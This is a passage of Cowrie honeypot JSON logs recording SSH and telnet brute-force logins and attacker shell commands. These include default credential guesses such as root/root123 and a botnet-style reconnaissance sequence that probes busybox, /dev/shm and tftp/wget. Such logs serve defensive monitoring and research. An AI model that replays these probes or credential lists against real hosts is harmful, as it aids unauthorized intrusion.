sh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.196613Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.345608Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:02:53.460243Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.461082Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.512279Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:02:53.513588Z","src_ip":"212.227.125.160","session":"24fe5b53f8dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33638,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a9cc383e708","protocol":"ssh","message":"New connection: 212.227.235.229:33638 (1.2.3.4:22) [session: 8a9cc383e708]","sensor":"my-vps","timestamp":"2025-08-28T19:04:39.890580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:04:39.891371Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:04:39.990359Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:04:40.289442Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:04:40.504460Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T19:04:40.505393Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:04:40.606069Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:04:40.607239Z","src_ip":"212.227.235.229","session":"8a9cc383e708"}
{"eventid":"cowrie.session.connect","src_ip":"37.75.134.98","src_port":34875,"dst_ip":"1.2.3.4","dst_port":23,"session":"e75392f8e1db","protocol":"telnet","message":"New connection: 37.75.134.98:34875 (1.2.3.4:23) [session: e75392f8e1db]","sensor":"my-vps","timestamp":"2025-08-28T19:05:59.747385Z"}
{"eventid":"cowrie.login.success","username":"root","password":"aquario","message":"login attempt [root/aquario] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.040220Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:06:00.512228Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.624675Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.626226Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.627098Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.628351Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.628918Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.629641Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox ZNDCA","message":"CMD: cat /proc/mounts; /bin/busybox ZNDCA","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.718899Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZNDCA","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZNDCA","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.843817Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox ZNDCA","message":"CMD: tftp; wget; /bin/busybox ZNDCA","sensor":"my-vps","timestamp":"2025-08-28T19:06:00.976624Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.110072Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.112860Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"/bin/busybox ZNDCA","message":"CMD: /bin/busybox ZNDCA","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.188884Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.190910Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.192297Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.193170Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8d7db9c9c72110c44e27cfc474bddd3cc10b207e811c1aefc557f85016d64532","size":3550,"shasum":"8d7db9c9c72110c44e27cfc474bddd3cc10b207e811c1aefc557f85016d64532","duplicate":false,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/8d7db9c9c72110c44e27cfc474bddd3cc10b207e811c1aefc557f85016d64532 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.195066Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.session.closed","duration":1.4532389640808105,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:06:01.200758Z","src_ip":"37.75.134.98","session":"e75392f8e1db"}
{"eventid":"cowrie.session.connect","src_ip":"14.189.162.139","src_port":54230,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c8d63935cab","protocol":"telnet","message":"New connection: 14.189.162.139:54230 (1.2.3.4:23) [session: 2c8d63935cab]","sensor":"my-vps","timestamp":"2025-08-28T19:07:58.132321Z"}
{"eventid":"cowrie.session.closed","duration":13.037185192108154,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:08:11.169436Z","src_ip":"14.189.162.139","session":"2c8d63935cab"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60858,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ed62c4924da","protocol":"ssh","message":"New connection: 217.72.205.35:60858 (1.2.3.4:22) [session: 5ed62c4924da]","sensor":"my-vps","timestamp":"2025-08-28T19:08:15.352371Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:08:15.353507Z","src_ip":"217.72.205.35","session":"5ed62c4924da"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":46677,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0526238ed97","protocol":"telnet","message":"New connection: 123.31.39.100:46677 (1.2.3.4:23) [session: f0526238ed97]","sensor":"my-vps","timestamp":"2025-08-28T19:08:49.111966Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":39186,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae10e73d3261","protocol":"telnet","message":"New connection: 123.31.39.100:39186 (1.2.3.4:23) [session: ae10e73d3261]","sensor":"my-vps","timestamp":"2025-08-28T19:08:50.127817Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38642,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed0e08cb8044","protocol":"ssh","message":"New connection: 212.227.235.229:38642 (1.2.3.4:22) [session: ed0e08cb8044]","sensor":"my-vps","timestamp":"2025-08-28T19:09:13.008301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:09:13.009485Z","src_ip":"212.227.235.229","session":"ed0e08cb8044"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:09:13.109378Z","src_ip":"212.227.235.229","session":"ed0e08cb8044"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop321","message":"login attempt [hadoop/hadoop321] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:13.411222Z","src_ip":"212.227.235.229","session":"ed0e08cb8044"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:09:14.513302Z","src_ip":"212.227.235.229","session":"ed0e08cb8044"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25043,"dst_ip":"1.2.3.4","dst_port":22,"session":"709cd774a2b3","protocol":"ssh","message":"New connection: 212.227.235.229:25043 (1.2.3.4:22) [session: 709cd774a2b3]","sensor":"my-vps","timestamp":"2025-08-28T19:09:34.188986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:09:34.189677Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:09:34.318841Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:34.916881Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.session.closed","duration":46.01049757003784,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:09:35.122399Z","src_ip":"123.31.39.100","session":"f0526238ed97"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:36.048522Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.session.closed","duration":46.00220489501953,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:09:36.129954Z","src_ip":"123.31.39.100","session":"ae10e73d3261"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd123","message":"login attempt [testuser/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:37.181521Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd1234","message":"login attempt [testuser/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:38.313595Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc1234","message":"login attempt [testuser/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:09:39.444982Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:09:40.578831Z","src_ip":"212.227.235.229","session":"709cd774a2b3"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":61568,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab72f53228cb","protocol":"ssh","message":"New connection: 80.94.95.112:61568 (1.2.3.4:22) [session: ab72f53228cb]","sensor":"my-vps","timestamp":"2025-08-28T19:10:56.901271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:10:56.902076Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:10:56.932528Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061992","message":"login attempt [admin/27061992] failed","sensor":"my-vps","timestamp":"2025-08-28T19:10:57.138833Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27061986","message":"login attempt [admin/27061986] failed","sensor":"my-vps","timestamp":"2025-08-28T19:10:58.171911Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27051982","message":"login attempt [admin/27051982] failed","sensor":"my-vps","timestamp":"2025-08-28T19:10:59.204574Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27041982","message":"login attempt [admin/27041982] failed","sensor":"my-vps","timestamp":"2025-08-28T19:11:00.236902Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27021983","message":"login attempt [admin/27021983] failed","sensor":"my-vps","timestamp":"2025-08-28T19:11:01.269506Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:11:02.302412Z","src_ip":"80.94.95.112","session":"ab72f53228cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62363,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12a413c0316","protocol":"ssh","message":"New connection: 212.227.235.229:62363 (1.2.3.4:22) [session: a12a413c0316]","sensor":"my-vps","timestamp":"2025-08-28T19:11:14.689517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:11:14.690526Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T19:11:14.967721Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.login.success","username":"root","password":"102030%","message":"login attempt [root/102030%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:11:15.795433Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:11:16.368871Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T19:11:16.369655Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:11:16.645532Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:11:16.646872Z","src_ip":"212.227.235.229","session":"a12a413c0316"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33724,"dst_ip":"1.2.3.4","dst_port":22,"session":"6011e996c504","protocol":"ssh","message":"New connection: 212.227.235.229:33724 (1.2.3.4:22) [session: 6011e996c504]","sensor":"my-vps","timestamp":"2025-08-28T19:11:37.365396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:11:37.366156Z","src_ip":"212.227.235.229","session":"6011e996c504"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:11:37.465365Z","src_ip":"212.227.235.229","session":"6011e996c504"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:11:37.767773Z","src_ip":"212.227.235.229","session":"6011e996c504"}
